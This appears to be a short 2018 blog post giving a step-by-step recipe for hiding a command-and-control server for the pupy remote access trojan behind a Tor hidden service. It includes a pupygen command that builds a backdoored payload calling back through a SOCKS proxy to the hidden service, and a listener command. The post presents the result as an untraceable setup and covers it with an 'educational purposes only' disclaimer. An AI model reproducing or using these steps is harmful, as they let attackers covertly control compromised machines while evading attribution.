How to set up your C2 on Tor.

Omaid Faizyar
2 min readJan 11, 2018

--

Setting up your Command & Control server on Tor is as easy as 1,2,3 and takes less than 5 minutes. This is totally for educational purposes only.

Step 0: Install the pre-requisites:

apt-get install git vim tor python-pip

Step 1: Set up your hidden service.

Modify your /etc/tor/torrc file. Find the line that has the following:

Uncomment these lines. Restart Tor. Go to /var/lib/tor/hiddenservice and cat the hostname file. This is your hidden service URL.

Step 2: Set up your C2.

Install pupy, a universal RAT backdoor written in Python. Create your backdoored file with the following command:

pupygen.py -f py auto_proxy — host <hiddenserviceurl> — add-proxy SOCKS5:127.0.0.1:9050 — no-direct -t ssl

Step 3: Start your listener!

pupysh.py -t ssl -p 80

Congrats! You now have a C2 with an untraceable* IP address.

--

--

Omaid Faizyar

I hack into companies for a living and dabble in Bitcoin. Sometimes get quoted on Russia Today.